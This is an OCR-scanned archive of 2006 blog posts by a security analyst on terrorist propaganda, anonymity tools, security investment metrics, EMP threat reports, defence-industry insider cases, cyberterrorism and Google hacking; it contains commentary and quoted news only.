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2.5.10 Is Bin Laden Lacking a Point? (2006-05-11 13:27) 


[1]lf | were to name the masters of PSYOPS, that would be terrorists, who without a super 
power’s financial capabilities still manage to achieve the "media echo" effect they seem to be 
so good at. As you will eventually read in case you haven’t though about it before, to me Al 
Jazeera always seems to be the launching platform given its strategic position in the region, 
and the rest of the world’s media are the disseminators - anything fresh and terrorism related 
increases raitings. 


Yesterday, | came across to a [2]translated version of Bin Laden’s most recent "State of 
Jihad" speech April 23, 2006, and | feel blaming the "infidels" for whatever goes around the 
world, or taking anything against Islam personally, is a very weak point. From the article : 


"One more time Al Jazeera pomotes an Usama Bin Laden speech. After airing portions 
of the Bin Laden audiotape al Jazeera posted large fragments of the “speech” on its web site. 
This was the longest version possible we were able to have access to. After careful reading, 
my assessment of the “piece” got reinforced: This is not just another audiotape or videotape 
of a renegade in some cave. 


Regardless of who is the speaker and his whereabouts, the 30 minutes long read state- 
ment is a declaration, probably as important as the February 1998 declaration of war against 
America, the Crusaders and their allies. Imagine yourself as an Arab viewer: The speech was 
repeated endlessly throughout the day. Bin Laden didn’t have his 20 minutes of shine, but 
24 hours at least. The Bin Laden audiotape wasn’t played one or two times but until every 
word was sinking deep in the minds of the attentive viewers. However the most powerful part 
of the speech wasn’t restricted to its content: Al Jazeera lined up the best of its "experts on 
Islamist groups" to react instantly to the audiotape and throughout the day, and add "more 
details and substance." 


At the bottom line, religion still remains the opium of the masses and an excuse for not 
taking care of your own destiny but expecting "someone else" to. 


420 


1. http://photos1. blogger .com/blogger/1933/1779/1600/bin-laden-on-the-run. jpg 


2. http: //counterterrorismblog.org/2006/04/bin_ladens_state_of_jihad_spee.php 


2.5.11 Pocket Anonymity (2006-05-11 14:07) 


While the threats posed by improper use of removable media will continue to make headlines, 
here’s a company that’s offering the complete [1]all-in-one pocket anonymity solution - at 
least that’s how they position it. From the [2]article : 


"Last month, a company called Stealth Ideas Inc. of Woodland Hills, Calif., came out 
with its StealthSurfer II ID Protect. The miniature flash drive lets you surf anonymously from 
any computer using an integrated browser that runs in an encrypted mode. It comes loaded 
with several tools, including Anonymizer Anonymous Surfing 1.540 (which has IP masking), 
RoboForm Pass2Go 6.5.9 (a user ID/password management application) and Thunderbird 
1.0.7 (for e-mail access). But before you buy, check to see if the company has upgraded 
its browser, which, according to company Officials at the product’s launch, is Firefox 1.5.0.1. 
US-CERT and others have warned about significant vulnerabilities in certain versions of Firefox 
(and Thunderbird, for that matter). The version available as of press time, Version 1.5.0.2, 
addresses those flaws." 


Is the Anonymizer behind the idea, or is ita middleman trying to add value to the Anonymizer’s 
existing offer, and harness the brand powers of Firefox and Hushmail all in one? Wise, but the 
entire idea of [3]Janonymity is based on the Anonymizer’s service, when anonymity still can 
be freely achieved to a certain extend. Very portable idea, the thing is there are already free 
alternatives when it comes to pocket anonymity and that’s [4]TorPark: Anonymous browsing 
on a USB drive, and | think | can live without the enhancements. 


1. tap: /www,stenltheurter biz/ 
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2.5.12 Travel Without Moving - Scratching the Floor (2006-05-11 14:55) 


You don’t really need a [1]reconnaissance satellite to spot this, it’s precisely the type of "sight" 
you can see for yourself on daily basis - but he’s still moving isn’t he? :) 


1. http://ddanchev. blogspot .com/2006/05/travel-without-moving-typhoon-class.htm 
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2.5.13 Terrorist Social Network Analysis (2006-05-12 20:09) 


[1]In previous posts "[2]Visualization, Intelligence and the Starlight project" and "[3]Visualiza- 
tion in the Security and New Media world" | covered various security and intelligence related 
projects and mostly emphasized on the future potential of visualizing data. [4]Data mining is 
still [5]Jeveryday’s reality - social networking as well. Just came across this at [6]DefenseTech : 


"[t’d be one thing if the NSA’s massive sweep of our phone records was actually helping 
catch terrorists. But what if it’s not working at all? A leading practitioner of the kind of analysis 
the NSA is supposedly performing in this surveillance program says that “it’s a waste of 
time, a waste of resources. And it lets the real terrorists run free." Re-reading the USA Today 
[7]piece, one paragraph jumped out: This kind of data collection from phone companies is not 
uncommon; it’s been done before, though never on this large a scale, the official said. The 
data are used for ’social network analysis,’ the official said, meaning to study how terrorist 
networks contact each other and how they are tied together. So! called [8]Valdis Krebs, who’s 
considered by many to be the leading authority on [9]social network analysis- the art and 
science of finding the important connections in a seemingly-impenetrable mass of data. His 
[10]analysisof the social network surrounding the 9/11 hijackers is a classic in the field." 


It gets even more interesting with a [11]comparison of a Fortune 500 company’s net- 
work and Al Qaeda’s one. Social networks are among the driving forces of Web 2.0, and | find 
the concept of communication and planning online a [12]very realistic one. And if you really 
want to know more about social networks in the business world, corporate anthropologist 
[13]Karen Stephenson - The Organization woman is really up to it, very good article. And of 
course, [14]Valdis Kreb’s blog on smart economic networks. 


. http: //photos1. blogger. com/blogger/1933/1779/1600/step_2.gif 
. http: //ddanchev. blogspot .com/2006/01/visualization-intelligence-and. htm 


ttp://ddanchev. blogspot .com/2006/03/visualization-in-security-and-new.htm 


. http: //ddanchev. blogspot .com/2006/03/data-mining-terrorism-and-security.htm 


1 
2 
3 
4 
5 
6 
7 

8 

9. http://www.tcf.org/list .asp?type=NC&pubid=1239 

10. 

1 

12. 

13 
14. 


42 


N 


2.5.14 Valuing Security and Prioritizing Your Expenditures (2006-05-15 14:16) 


[1]l often blog on various market trends related to information security and try to provide an 
in-depth coverage of emerging or current trends - in between active comments. In previous 
posts "[2]FBI’s 2005 Computer Crime Survey - what’s to consider?", "[3]Spotting valuable 
investments in the information security market", "[4]Why we cannot measure the real cost of 
cybercrime?", "[5]Personal Data Security Breaches - 2000/2005" and, "[6]To report, or not to 
report?" | emphasized on the following key points in respect to data security breaches and 
security investments : 


- on the majority of occasions companies are taking an outdated approach towards secu- 
rity, that is still living in the perimeter based security solutions world 


- companies and data brokers/aggregators are often reluctant to report security breaches even 


when they have the legal obligation to due to the fact that, either the breach still hasn’t 
been detected, or the lack of awareness on what is a breach worth reporting 


- the flawed approaches towards quantifyingthe costs related to Cybercrime are resulting 
in overhyped statements in direct contradiction with security spending 


- companies still believe in the myth that spending more on security, means better secu- 
rity, but that’s not always the case 


- given the flood of marketing and the never ending "media echo" effect, decision mak- 
ers often find themselves living with current trends, not with the emerging ones, which is what 
they should pay attention to 
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It is often mistaken that the more you spend on security, the higher level of security 
would be achieved, whereas that’s not always the case - it’s about prioritizing and finding the 
most suitable metrics model for your investment. 


Here’s an [7]Jarticle describing exactly the same impression : 


"Security breaches from computer viruses, spyware, hacker attacks and equipment theft 
are costing British business billions of pounds a year, according to a survey released Tuesday. 
The estimated loss of $18 billion (10 billion pounds) is 50 percent higher than the level 
calculated two years ago, according to the survey that consultancy PricewaterhouseCoopers 
conducted for the U.K. Department of Trade and Industry. The rise comes despite the fact 
that companies are increasing their spending on information security controls to an average 
4 percent or 5 percent of their IT budget, compared with 3 percent in 2004." 


That’s pretty much the situation everywhere, companies are striving to apply metrics to 
security investments and this is where it all gets blur. Spending more on security might seems 
to be logical answer, but start from the fact that open networks, thus exposed to a great deal 
of uncontrollable external factors, undermine the majority of models so far. Bargaining with 
security, or "[8]Getting paid for getting hacked" remains a daily practice whatsoever. Let’s 
consider various social aspects concerning the participants. 


A financial executive often wants to know more on: 


- Do | get any return on my investment (ROI) ? 
- What % of the risk is mitigated and what are your benchmarking methods? 


- What may | lose if | don’t invest, and where’s the sweet spot? 
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- How much is enough? 
- How do | use basic financial concepts such as diversification in the security world? 


- How would productivity be influenced due to the lack of solutions, or even their actual 
use? 


A security consultant on the other hand might be interested in - How do | convince se- 
nior management in the benefits of having a honeyfarm in respect to mitigating the overall 
risk of having real systems breached into, without using Cyberterrorism as the basis of 
discussion? 


These different school’s of though, positions, responsibilities and budget-allocation hun- 
gry individuals are constantly having trouble communicating with each other. And while you 
cannot, and perhaps even should not try to educate your security workforce in to the basics 
of finance, an understanding of both side’s point of view may change things - what you don’t 
see value in, is often someone else’s treasure. 


Another [9]recent article on the topic of justifying security expenditure, or mostly assign- 
ing value made me an impression : 


"So we came up with Value Protection," Larson says. "You spend time and capital on se- 
curity so that you don’t allow the erosion of existing growth or prevent new growth from 
taking root. The number-one challenge for us is not the ability to deploy the next, greatest 
technology. That’s there. What we need to do now is quantify the value to the business of 
deploying those technologies." "It adds value; we’re very supportive of it," says Steve Schmitt, 
American Water’s vice president of operations, of Larson’s Value Protection metric. For a 
while, people were just trying to create reasonable security, Schmitt says, "but now you need 
something more—something that proves the value, and that’s what Bruce developed. Plus, 
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as a secondary benefit, it’s getting us better visibility from business owners and partners on 
risks and better ways to mitigate the risks." 


Good point on first estimating the usefulness of current technologies, before applying 
the "latest", or "newest" ones. The rest comes to the good old flaws in the ROSI model, how 
would you be sure that it would be the $75,000 virus outbreak that will hit your organization, 
and not the $5000 one? "[10]Return On Security Investment (ROSI) - A Practical Quantitative 
Model" emphasized on the challenges to blindly assigning the wrong value to a variable : 


"The virus scanner appears to be worth the investment, but only because we’re assum- 
ing that the cost of a disaster is $25,000, that the scanner will catch 75 % of the viruses and 
that the cost of the scanner is truly $25,000. In reality, none of these numbers are likely to 
be very accurate. What if three of the four viruses cost $5,000 in damages but one costs 
$85,000? The average cost is still $25,000. Which one of those four viruses is going to get 
past the scanner? If it’s a $5,000 one, the ROSI increases to nearly 300 % - but if it’s the 
expensive one, the ROSI becomes negative!" 


Among the first things to keep in mind while developing a risk management plan, is to 
identify the assets, identify the potential attackers, and find ways to measure the threat expo- 
sure and current threatscape as well. In a publication | wrote three years ago, "[11]Building 
and Implementing a Successful Information Security Policy", that as a matter of fact | still find 
a quality and in-depth reading on the topic, | outlined some ideas on achieving the full effect 
of the abovementioned practices - it’s also nice to came across it given in [12]assignments 
and discussed in [13]lectures too. An excerpt on Risk Analysis : 


As in any other sensitive procedure, Risk Analysis and Risk Management play an essen- 
tial role in the proper functionality of the process. Risk Analysis is the process of identifying 
the critical information assets of the company and their use and functionality - an important 
(key) process that needs to be taken very seriously. Essentially, it is the very process of 
defining exactly WHAT you are trying to protect, from WHOM you are trying to protect it and 
most importantly, HOW you are going to protect it." 
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Identifying the threats and some current threats worth keeping in mind 
- windows of opportunities/Oday attacks 

- lousy assets/vulnerability/patch management 

- insecure end users’ habits 

- sneaky and sophisticated malicious software 

- wireless/bluetooth information leakage 


- removable media information leakage 


How would you go for measuring the risk exposure and risk mitigated factor? 


Risk exposure and risk mitigated are both interesting and hard to quantify, should we 
consider the whole population given we somehow manage to obtain fresh information on the 
current threats ( through the use of Early Warning System such as [14]Symantec’s DeepSight 
Analyzer, [15]The Internet Storm Center, or [16]iDefense’s Intelligence services for instance). 
Today, it is often based on: 


- the number of workstations and network assets divided by the historical occurrence of 
a particular security event on the network - the use of mobile agents for the specifics of a 
company’s infrastructure effects is hard sometimes 
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- on the historical TCO data related to typical breaches/security events 


Risk mitigated is often tackled by the use of Best practices - whether outdated or rele- 
vant is something else, Cyber Insurance and the current, sort of, scientifically justified ROSI 
model are everyday’s practice, but knowing the inner workings of your organization and 
today’s constantly changing threatscape and how it(if) affects you is a key practice while 
prioritizing expenditure. You cannot, and should not deal with all the insecurities facing your 
organization, instead consider prioritizing your security expenditure, not just following the 
daily headlines and vendor-released, short-term centered research. 


It’s hard to quantify intellectual property’s value, the way it’s hard to quantify TCO loses 
due to security breaches and it’s perhaps the perfect moment to mention the initiative that | 
undertook in the beginning of this year - a 50/50 security/financial cross-functional team on 
coming up with a disruptive idea - more on the current status soon, still, thanks for the time 
and efforts folks! To sum up, a nice quote by the authors of the research | mentioned : "Most 
of the problems stem from the fact that security doesn’t directly create anything tangible - 
rather it prevents loss. A loss that’s prevented is a loss that you probably won’t know about." 


At the bottom line, are you making money out of having security, that is thinking busi- 
ness continuity, not contingency planning, and should we keep on trying to adapt financial 
concepts, and not rethinking them all? 


Recommended reading/resources on the topic of justifying security expenditure : 
[17]Return on Information Security Investment 
[18]Risk - A Financial Overview 


[19]Calculated Risk - Guide to determining security ROI 
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[20]The Return on Investment for Network Security 

[21]Analysis of Return on Investment for Information Security 
[22]Methodologies for Evaluating Information Security Investments 
[23]Risk Assessment for Security Economcis - very informative slides 
[24]Economics and Security Resource page 


[25]Information Security in the Extended Enterprise: Some Initial Results From a Field 
Study of an Industrial Firm 


[26]PKI and Financial Return on Investment 
[27]Privacy Breach Impact Calculator 


[28]Guide to Selecting Information Technology Security Products 


. http://photos1. blogger .com/blogger/1933/1779/1600/value. jpg 


. http: //ddanchev.blogspot.com/2006/01/fbis-2005-computer-crime-survey-whats.htm 
. http: //ddanchev. blogspot .com/2006/04/spotting-valuable-investments-in. html 


. http://ddanchev. blogspot .com/2006/01/why-we-cannot-measure-real-cost-of .htm 
. http: //ddanchev.blogspot .com/2006/01/personal-data-security-breaches.htm 
. http: //ddanchev.blogspot .com/2006/01/to-report-or-not-to-report .htm 


. http://news.zdnet .co.uk/internet/security/0 , 39020375, 39265531, 00.htm 


ttp://ddanchev.blogspot.com/2006/03/getting-paid-for-getting-hacked_17.htm 
http://www. csoonline . com/read/040106/value_visible. html 

. http://www. securemark .us/downloads/ROSI-Practical_Model-20050406. pdf 

_ http://www. windowsecur ity. com/pages/security-policy. pdf 
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ttp://dcm.cl.uh.edu/nsfsecurity/public/Modules/AYang Module/admi1/Assignment1/AdmiiAssign1 .htm 
13. http://ece. gmu.edu/~gmartin/fal105/tcom562-f05. ht 
14. http://analyzer.symantec.com/ 
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15. http://isc.sans.org 
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16. http://www. idefense.com 
17. http://www.infosecwriters.com/text_resources/pdf/ROISI. pdf 
18. http://www. csoonline.com/read/110104/interview.htm 

19. http://www. csoonline.com/read/120902/calculate.htm 

20. http://www.cisco.com/warp/public/cc/so/neso/sqso/roi4_wp.pd 


. http://www. getronics.com/NR/rdonlyres/en6bl7yole4i5vzvzzzrl5ud3klueu2ex5mnyt 2it3zwuivhfkenfftpxjn3gsewh3b 
ihoeconfdy3u5x33zpw2mqlb/SecurityROI . pdf 


22. http://csrc.1se.ac.uk/asp/aspecis/20050136. pdf 
23. http://www.dmi.unict.it/~giamp/wsf/05Material/spagnulo. pdf 
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24. http://www.cl.cam.ac.uk/~rjai4/econsec.htm 
25. http://infosecon.net/workshop/pdf/51.pdf 


26. http://www. pkiforum. org/pdfs/Financial_Return_on_Investment. pdf 
ttp://searchsecurity.techtarget .com/general/0, 295582, sid14_gci1182844, 00. html?track=NL-430&ad=551180 


28. http://csrc.nist.gov/publications/nistpubs/800-36/NIST-SP800- 36. pdf 
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2.5.15 EMP Attacks - Electronic Domination in Reverse (2006-05-16 14:21) 


[1]Yesterday, | came across to an updated(April 14, 2006) CRS report - [2]High Altitude 
Electromagnetic Pulse (HEMP) and High Power Microwave (HPM) Devices: Threat Assessments, 
a topic | covered in a previous post related to [3]Jasymmetric warfare. 


Basically, it outlines critical issues such as, what is the U.S(or pretty much any other 
country thinking asymmetric warfare) doing to ensure critical civil infrastructure is protected 
against EMP attacks, how does the vulnerability of EMP attacks encourage other nations to 
develop such capabilities, and yes, of course the "threat" of terrorist EMP warfare - in your 
wildest dreams only. An excerpt : 


"However, other analysts maintain that some testing done by the U.S. military may have 
been flawed, or incomplete, leading to faulty conclusions about the level of resistance of 
commercial equipment to the effects of EMP. These analysts point out that EMP technology has 
been explored by several other nations, and as circuitry becomes more miniaturized, modern 
electronics become increasingly vulnerable to disruption. They argue that it could possibly 
take years for the United States to recover fully from widespread damage to electronics 
resulting from a large-scale EMP attack." 


Why wouldn’t a "reported sponsor of terrorist" nations wage EMP warfare, or even try to 
over the U.S? Because they would have the U.S in their backyard in less than a day, but the 
opportunity to balance the powers, or achieve temporary military advantage given the attack 
remains undetected is a tempting factor for future developments - the ongoing miniaturization 
and the fact that intense energy effects can be can be produced without an A-Bomb makes 
it even worse. Surgical HPM and EMP attacks without fear of retaliation is what possible 
adversaries could be aiming at, and of course portability : 


"Other HPM weapons being tested by the military are portable and re-usable through 
battery-power, and are effective when fired miles away from a target. These weapons can 
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also be focused like a laser beam and tuned to an appropriate frequency in order to penetrate 
electronics that are heavily shielded against a nuclear attack. The deepest bunkers with the 
thickest concrete walls reportedly are not safe from such a beam if they have even a single 
unprotected wire reaching the surface." 


Yesterday | was looking for an article | wrote in 1998 on Nuclear Weapons and seem to 
have found it - it makes me smile given my age, and the fact that | had to orally defend 
the topic, hope you will find it an interesting retro read :) | don’t necessarily agree with all 
the things, it just the way | was perceiving the world back than. For instance, Russia didn’t 
accelerate their scientific efforts, as the A-bomb secret eventually leaked out to them, and 
with the fall of the Soviet Union and ICBMs available in every corner of the country and its 
republics, it wasn’t hard for other nations to piggyback too. 


Did you know that Stalin was aware of the U.S’s A-bomb, [4]even [5]before Harry Tru- 
man was? - the consequence of too much secrecy sometimes! 


Nuclear Weapons 


There has always been war, and will always be though we live in more peaceful world 
nowadays. It’s a long time that nuclear weapons are not the same threat to the world’s peace 
as they were years ago. Despite all the reducement and limitation of nuclear weapons they 
haven’t disappeared yet completely. Today all the nuclear arsenals are able to kill everybody 
on EARTH, a thousand times, though nobody wants to die even once. One of the greatest 
scientific and human’s achievements - mastering the nuclear energy, is in position both to 
change the traditional sources of energy, and to move toward the social progress. However, 
this discovery was used not in people’s behalf, but against it. 


During Truman’s leadership nuclear scientists were working on the project"MANHATTAN" 
as they were to finish mastering the nuclear energy, but they didn’t know that their discovery 
would change completely the world to worse, demanding death to million people. Americans 
have always been competing with Russians in each sphere. When Americans discovered the 
A-BOMB Russians were far from it. Then Truman decided to drive Russia into a corner. But he 
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didn’t have the chance, due to Stalin who ostensibly didn’t pay attention to the threat. To show 
his power Truman threw the A-BOMB on Hiroshima on 6 of August at 8 :00 am. It generated a 
huge amoung of energy when it exploded. Most people died within a few hours. By the end Of 
1945 the estimated number of peole who died as a direct result of the bomb was 140,000. But 
later it has been concluded that the number of people who died was approximately 200,000, 
even more. Russia decided that it could’t last so long and accelerated the speed of doing their 
project for the A-BOMB several times. Only for 4 years they worked it out which the Americans 
succeeded for 20. As Russia’s A-BOMB appeared the United State’s plans for starting a war 
and attack Russia made them think. 


All their plans went wrong. When the U.S controlled the weapons of mass destruction 
their strategists used to think about the harmful power of the weapons. Now, the U.S have 
completely changed their policy line. When a conflict arise anywhere in world they would help. 
When a disaster damages a country, when a war starts they always stand by the side of the 
weaker. They mastered outer space and they don’t do it just for themselves but for the whole 
mankind. Now all the people in world develop good relationships. But we live in a troubled 
world. Our daily cares are increasingly dwarfed by the thought that they may vanish in a flash. 
People separated by continents and oceans are uneted in their wish to prevent the global 
nuclear catastrophe. Young people today do not wish war they want peace and love. It’s not 
just a wish, it’s a must! 


This is eight years ago, and I’m still keeping the spirit | guess :) 


http: //photos1. blogger. com/blogger/1933/1779/1600/EMP. jpg 
ttp://www.fas.org/sgp/crs/natsec/RL32544. pdf 


1. ; 
2. . 
3. http: //ddanchev. blogspot . com/2006/02/who-needs-nuclear-weapons- anymore. html 
4, netp://wuv.dannen. con/decision/potsdan. ea 
5. : 


ttp://killeenroos.com/5/bomb/decision. ht 


2.5.16 Insider Competition in the Defense Industry (2006-05-16 14:49) 


[1]While there aren’t any [2]smoking emails mentioned in this case, where else can we spot 
[3]insiders if [4]not in the defense industry, an industry where securing government-backed 
contracts, or teasing military decion makers with the latest technologies ensures the long-term 
existence of the business itself? From the [5]Jarticle : 
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"Boeing has been under investigation for improperly acquiring thousands of pages of ri- 
val Lockheed Martin’s proprietary documents in the late 1990s, using some of them to help 
win a competition for government rocket-launching business. The government stripped Boeing 
of about $1 billion worth of rocket launches for its improper use of the Lockheed documents." 


[6]Boeing and [7]Lockheed Martin remain the key players in the defense industry, ensur- 
ing their portfolio of services (cyberwarfare, theater warfare, grid networking compatibility 
etc.) remain competitive. | once said that during the Cold War, the tensions between the 
U.S and the Soviet Union used to be the driving force of progress and innovation, these days, 
terrorism is the driving force and the "excuse" for military and intelligence spending. And 
while NASA’s budget has been decreasing with the time, the next major space innovation 
wouldn’t come from NASA, but from the commercial sector. 


What’s the bottom line? A minor short-term effect, and long-term business continuity 
for sure as "Boeing shares fell $1.76, or 2 percent, to $85.25 in morning trading on the New 
York Stock Excange." 


1. http://photos1 .blogger .com/blogger/1933/1779/1600/insider-trading.1.gif 
2. http: //ddanchev. blogspot .com/2006/02/smoking- emails .htm 


3. http://ddanchev.blogspot .com/2005/12/insiders-insights-trends-and-possible.htm 


4. http://ddanchev. blogspot .com/2006/04/insider-fined-870.htm 


5. http://www. businessweek.com/ap/financialnews/D8HKAJMO2.htm?campaign_id=apn_home_down&chan=db 


6. http://www.boeing.com/product_list.htm 


7. http://www.lockheedmartin.com/wms/findPage .do?dsp=feck&ci=5&sc=400 


2.5.17 Techno Imperialism and the Effect of Cyberterrorism (2006-05-16 15:20) 


It’s been a while since I’ve last blogged [l]about [2]Cyberterrorism, and while many did 
mentioned the topic in between the recent [3]DRDoS attacks, Cyberterrorism is so much more 
than simply shutting down the Internet, namely the ability to communicate, research, recruit 
and use propaganda to achieve goals based on ideological beliefs, or the convergence of 
Terrorism and the Internet. 


Can we argue that cyberterrorism is the direct effect of [4]techno imperialism, or let’s 
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use a more friendly word such as IT-dependent society and information infrastructure? 


What exactly does cyberterrorism mean? When does an average internet user’s mali- 
cious activity turns into cyberterrorism ones? Are there clear definitions, or the lack of such 
as resulting in the in a total misunderstanding for both, the media and the general public. The 
recently released Google Trends, which | covered in a previous [5]post, doesn’t even count Cy- 
berterrorism, so | looked further and came across to a very good research "[6]Fear-mongering 
or fact: The construction of ‘cyber-terrorism’ in U.S., U.K, and Canadian news media" that 
aims to emphasize on the common misunderstanding when defining Cyberterrorism and the 
media’s acceptance of the concept. The outcome? Declining media presence with the years, 
to end up where it is [7]today, but what you should keep in mind is that the concept is still out 
there. 


Trying to seperate Cyberterrorism as a tool for achieving Information Warfare dominance 
is like on purposely ignoring the the big picture - that Cyberterrorism, one that sometimes 
results out of [8]hacktivism tensions is a powerful tool for achieving the full effect of informa- 
tion warfare. Whereas such attacks occur all the time, | can argue that the actual impact of 
cyberterrorism cannot be easily and quantitatively justified. We all know that it’s theoretically 
logical for terrorists to use the Internet for various cyberplanning and cyber communication, 
what can we do about it? 


[9]Crawling for terrorist web sites clearly associated with different organizations, or try- 
ing to spot terrorist symphatizers have been in the execution stage for yers. Projects such 
as the [10]Terrorism Knowledge Discovery Project, take a very deep look into the subject 
by introducing Terrorism Knowledge Portal, an aggregated source for intelligence. Moreover, 
according to a recent [11]article : 
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"SAIC has a $US7 million Defence Department contract to monitor 1500 militant websites that 
provide al Qaeda and other militant organisations with a main venue for communications, 
fund-raising, recruitment and training." \t’s also interesting to note other initiatives that 
started back in 2001, such as the [12]Automatic Identification of Extremist Internet Web Sites. 


Another concept goes in-depth into [13]Confronting Cyberterrorism with Cyber Deception as 
"if it is possible to deceive terrorists, then it should also be possible to deceive cyberterrorists. 
The reliance of cyberterrorists on information technology makes them vulnerable to cyber 
deceptions. In addition, many of the methods and tools that cyberterrorists would use are 
similar to those used by other less malicious hackers, so we can plan specific deceptions to 
use against them in advance." As you can see on the grid above, the actors, the deception 
target and the level of difficulty provide more insight into the idea, great research! 


Steganography embedded images used by terrorists on the public web can be doubtful, 
but on the Dark Web, why not? According to a [14]research | came across to some time ago : 


"IN academia, graduate students Niel Provos and Richard Honeyman at the University of 
Michigan have written a web crawling program to detect steganographic images in the wild. 
The program has already digested 2 billion JPEG’s on popular sights such as ebay and has so 
far found only one stego-image in the wild. The detected image was on an ABC web page that 
dealt with the topic of steganography." 


[15]Detecting Steganographic Content on the Internet as a [16]concept has been around for 
ages, while plain old encryption is the de-facto practice according to a well [17]researched 
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news article : 


¢ Wadih El Hage, one of the suspects in the 1998 bombing of two U.S. embassies in 
East Africa, sent encrypted e-mails under various names, including "Norman" and "Abdus 
Sabbur," to "associates in al Qaida," according to the Oct. 25, 1998, U.S. indictment against 
him. Hage went on trial Monday in federal court in New York. 


¢ Khalil Deek, an alleged terrorist arrested in Pakistan in 1999, used encrypted computer files 
to plot bombings in Jordan at the turn of the millennium, U.S. officials say. Authorities found 
Deek’s computer at his Peshawar, Pakistan, home and flew it to the National Security Agency 
in Fort Meade, Md. Mathematicians, using supercomputers, decoded the files, enabling the 


FBI to foil the plot. 


¢ Ramzi Yousef, the convicted mastermind of the World Trade Center bombing in 1993, 
used encrypted files to hide details of a plot to destroy 11 U.S. airliners. Philippines officials 
found the computer in Yousef’s Manila apartment in 1995. U.S. officials broke the encryption 
and foiled the plot. Two of the files, FBI officials say, took more than a year to decrypt. 
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Among the many cases | am aware of worth mentioning are : 


- [18]What are the real risks of cyberterrorism? In 1998, a 12-year-old hacker broke into 
the computer system that controlled the floodgates of the Theodore Roosevelt Dam in Arizona, 
according to a June Washington Post report. If the gates had been opened, the article added, 
walls of water could have flooded the cities of Tempe and Mesa, whose populations total nearly 


1 million. 


- [19]Cyberterrorism: How Real Is the Threat? Yonah Alexander, a terrorism researcher 
at the Potomac Institute—a think tank with close links to the Pentagon—announced in De- 
cember 2001, the existence of an “Iraq Net.” This network supposedly consisted of more 
than one hundred websites set up across the world by Iraq since the mid-1990s to launch 
denial-of-service or DoS attacks against U.S. companies. The concept of [20]botnets wasn’t 
that popular at the time, so that’s an example of marginal thinking on acquiring DoS power. 


- [21]In the indictment against Zacharias Moussaoui, it states that Moussaoui had among his 
possessions a flight simulator program, software for reviewing pilot procedures for a Boeing 
747 Model 400, and a computer disk of information on aerial spraying of pesticides. The 
indictment also outlines Moussaoui’s use of e-mail to inquire about flight training. 
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- [22]For almost two years, intelligence services around the world tried to uncover the 
identity of an Internet hacker who had become a key conduit for al-Qaeda. The savvy, 
English-speaking, presumably young webmaster taunted his pursuers, calling himself Irhabi 
- Terrorist - 007. He hacked into American university computers, propagandized for the Iraq 
insurgents led by Abu Musab al-Zarqawi and taught other online jihadists how to wield their 
computers for the cause. 


| can argue which article is more intriguing compared to [23]BusinesWeek’s writeup on 
catching the [24]ShadowCrew, but anyway all you need to a get a reader’s attention is aname 
such as Abu Musab al-Zarqawi, a point that | feel is totally brainwashed in this paragraph :) 


Cyberterrorism is an inseparable part of Information Warfare, and while we would hopefully 
never witness a catastrophic scenario, that is offensive use of Cyberterrorism, recruitment 
and propaganda flood the Internet on a daily basis. Just stop being suspicious about everyone, 
and try to enjoy life in between, can you, as terrorists are not everywhere - but where we see 
them at the bottom line! 


. http: //ddanchev. blogspot .com/2006/01/cyberterrorism-recent-developments .htm 
. http: //ddanchev. blogspot .com/2005/12/cyberterrorism-dont-stereotype-and-its.htm 


ttp://ddanchev. blogspot .com/2006/04/on-insecurities-of-internet_13.htm 


. http: //www.zmag.org/Sustainers/Content/2001-10/04healy. cfm 
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5. http: //ddanchev. blogspot .com/2006/05/snooping-on-historical-click-streams.htm 
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. http: //www.oii.ox.ac.uk/research/cybersafety/extensions/pdfs/papers/susan_keith. pdf 


. http: //news. google. com/news?hl=enkned=us&q=cyberterrorism&ie=UTF-8&scoring= 


. http: //ddanchev. blogspot .com/2006/02/hacktivism-tensions.htm 
. http: //ddanchev. blogspot .com/2006/02/1ook-whos-gonna-cash-for-evaluating.htm 
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. http://ai.arizona.edu/people/edna/AILab_terrorism/20Knowledge/20Discovery/20IS1/,20_apr04. pdf 
11. 
12. 
13. 
14. 


ttp://www.citi.umich.edu/techreports/reports/citi-tr-01-11.pdf 


16. http://www. chromesplash.com/jcallinan.com/publications/steg. pdf 
17. http://www.usatoday.com/tech/news/2001-02-05-binladen.ht 

18. http://news .zdnet .com/2100-1009_22-955293.htm 

19. http://www.usip.org/pubs/specialreports/srii9.htm 


20. http: //ddanchev. blogspot . com/2006/02/war-against-botnets-and-ddos-attacks.htm 


21. http://www.ists.dartmouth.edu/TAG/ITB/ITB_032004.pdf 
22. http://www.washingtonpost .com/wp-dyn/content/article/2006/03/25/AR2006032500020_pf.htm 


23. http://www. businessweek.com/magazine/content/05_22/b3935001_mz001.htm 
24. http://news.com.com/Photo+Shadowcrewtsitetintfederalt+custody/2009-7348_3-5431431 .htm 


2.5.18 Travel Without Moving - Cheyenne Mountain Operations Center 
(2006-05-22 17:16) 


[1]lt’s a small world - and a busy one, this post was supposed to appear the previous week 
so here it goes. There are certain [2]places you just can’t miss on the world’s map, and the 
[3]Cheyenne Mountain Operations Center is one of them. Remember the typical massive gate 
in the [4]War Games movie, or in pretty much any other military/intelligence thriller you’ve 
watched? Try this one. [5]Nuke it, [6]JEMP it, it’s supposed to stand tall, yet it remains a 
visible sensitive location for you to enjoy [7]without moving. The other day | came across to a 
report that | somehow missed in relation to various threats - if any - posed by [8]Google Earth. 
"[9]Google Earth Study: Impacts and Uses for Defence and Security" is worth the [10]read : 


"The Google Earth study on the impacts and uses for defence and security is aimed at 
answering a number of questions. What are the technical features, the reliability and limits of 
GE data and software, regarding international security regulations? Which confidence in data, 
real dangers of a pernicious use, or impacts of such an easy access to imagery is there on 
users or the geographical information market? What are the new applications stemming from 
GE, which services can be derived from this application, or what are the ways to integrate GE 
into an information system?" 


Stay tuned for the upcoming Oday sights from around the world. 


1. http://photos1. blogger .com/blogger/1933/1779/1600/dod_operations. jpg 


2. http://maps.google.com/maps?f=q&hl=enkq=Cheyenne+Mountain&11=38 . 744359 , -104.84671&spn=0. 00415, 0.010729&t 


&om=1 


10. 


3. 
4. 
5. 
6. http: //ddanchev. blogspot .com/2006/05/emp-attacks-electronic-domination-in.htm 
7. 
8. 
9. 


2.5.19 Nation Wide Google Hacking Initiative (2006-05-23 18:21) 


[1]The idea of doing reconnaissance for the purpose of pen testing or malicious activity 
through google hacking, has already reached levels of automation - the problem is how the 
threat gets often neglected by those that actually suffer from a breach later on. | came across 
to an [2]article pointing out that : 


"Anyone who wants to hack into sensitive information on New Zealand internet sites might 
be pleased to know it can be as easy as typing keywords into a Google search. Researchers 
at Massey University’s Albany campus say the country’s websites are more vulnerable to 
"Google hacking" than anywhere else in the world. University Information and Mathematical 
